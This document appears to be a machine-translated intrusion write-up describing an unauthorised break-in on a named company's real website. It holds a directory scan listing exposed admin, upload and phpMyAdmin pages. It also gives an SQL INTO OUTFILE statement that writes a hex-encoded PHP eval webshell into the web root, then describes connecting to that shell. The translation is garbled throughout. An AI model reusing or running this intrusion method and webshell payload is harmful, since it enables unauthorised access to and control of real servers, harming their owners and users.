TCL Penetration Process

Daniel laughed. In fact, this is luck.

Target website www.tcl.com

Website Structure

Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9
Mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0

The scan result is as follows:

Http://www.tcl.com: 80/% 23sql. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/% 23sql. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/% 23sql. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/aHTTP/1.1 200 OK
Http://www.tcl.com: 80/cgi-bin/HTTP/1.1 403 Forbidden
Http://www.tcl.com: 80/index. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/main/HTTP/1.1 403 Forbidden
Http://www.tcl.com: 80/NewsHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/HTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/default. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin_login.phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/login. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/manage/login. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/HTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. aspxHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/newadmin/test. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/newslogin.htm. HTTP/1.1 200 OK
Http://www.tcl.com: 80/phpinfo. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/upload. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/upload. php? Action = upfileHTTP/1.1 200 OK
Http://www.tcl.com: 80/phpinfo. phpHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/wenzhang. mdbHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/admin/upfile. aspHTTP/1.1 200 OK
Http://www.tcl.com: 80/news/HTTP/1.1 200 OK
Http://www.tcl.com: 80/phpmyadmin/HTTP/1.1 200 OK
 

There are still many issues that will not be sent

Access http://www.tcl.com: 80/newslogin.htm.

Directly expose the path

Fatal error: Cannot instantiate abstract class Action in/opt/lampp/htdocs/tcl/Front/Runtime /~ Runtime. php on line 2

Now let's take a look at this http://www.tcl.com: 80/phpmyadmin/

Try to access

This SB vulnerability exists in the background of phpmyadmin without having to use any account or password. If you really don't understand the tcl website, the website protection staff will have this vulnerability.
After logging on to the phpmyadmin background, didn't we get the absolute path strength?

Write a sentence using SQL

Click SQL

Select 0x3C3F706870206576616C28245F504F53545B636D645D293F3E into outfile/opt/lampp/htdocs/tcl/2b. php;

Access www.tcl.com/2b.php and use the client to connect to www.tcl.com/2b.php.

The displayed blank indicates that the data is successfully inserted and connected to the client.

The next thing to win is to pass the webshell, and I will not take a txt flash.